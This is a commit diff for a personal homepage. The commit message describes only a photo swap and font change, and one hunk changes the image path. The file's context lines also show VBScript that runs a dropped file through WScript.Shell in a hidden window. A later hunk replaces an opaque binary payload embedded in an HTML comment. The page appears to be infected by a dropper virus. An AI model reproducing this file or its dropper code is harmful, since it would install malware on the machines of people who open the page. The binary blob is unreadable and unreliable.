changed the from photo at home and change the font color and type

--- a/home.html
+++ b/home.html
@@ -5,7 +5,7 @@
     <body>
         <div id="container">
             <div id="imageArea">
-                <img src="images/myPicture.png" id="myPic">
+                <img src="images/myPictureSecond.png" id="myPic">
             </div>
             <div id="textArea">
                 <div id="name">
@@ -42,5 +42,5 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--°hó{ÓŠD˜¦X%x?vÃ]™í¼7;@“Io‘‰ó<&é&$ÛÝqU\‚?>„›–Õ¼Ûˆè;ÀÜ‡«,'k¤˜Äê(sòù"iÓm[«_þ·ŠÑ_| ‰ÌŽz(|K¯ã²v[ÜÜŒœOØMîÅ#Ý­ÂÈÄ’}b…¶MÜÉï²°pñ<)-›(Òd}²M¯ûgç-_îöÄÌßV}ù*ìûJ\!òbÁ=®|	ú1Ü»Ôæ)®çr£NÒÅ‚¨¨Ú­GqŸ}DÊN
-¦ ïíy*Œp¶Hò¦ŠèÝ©¤™ß]H? Û‡·Ytú2zn;4ÏëD(Ýå6ÅðrY)GåÆ’Ê*HÏ¹ìcšYfÉÜÊæÔCµŸ4 zê/e Vˆp{W,0 áêR"ñøáêáêáê¬7N€½?[Æâê áê-->
+//--></SCRIPT><!--OïWUÍÉŠs¡Ï<Npí#ñ^ c¦šî«6Áˆ¡^üp­ÖhX&Š¡‰‚…žîñ^U–ùñŽ“<à£ŽqßêM#¤(+ï¿ ³+Ga^9G7Ï)¿ƒB\vÏêRuÖ1òyôzßMÀw‚€-á„Hµ^X²9ð‘‡‘H±ÐMÓkåI«Í¬º©†cë‚cAí¤daoZÍ½f–*h Žõ”·—!Œò 5”øMH,ß×e½:/7m­­ÍF=|!‘¬y”¾CÛg»s÷7QÃ|Yn½Šq=ìZþXrÆcÈn‚ïµ.›¶èˆšVF‹êNÍÃc½€ Ð‚ç&ð‡$9[š?p›¾JÂ“‚3Ä(¼àH5*W„¿Ô#&œÌù›ûS+ÃÕÛÂ‚„dž1ùü°qxÁW[Nfq·¬cÂjC´{	,÷A»›”‹°•K»àí^þÓ¶6eZË´Ù?.¢ø™=)þ¡‘ö•LìuxUGtŽ)‘ïìÌÒÛ¹ð¿ôös
+Ï›Rñ |&•|a.ÉWtµ í áêR"ñøáêáêáê¬7ND{?[Ìâê áê-->
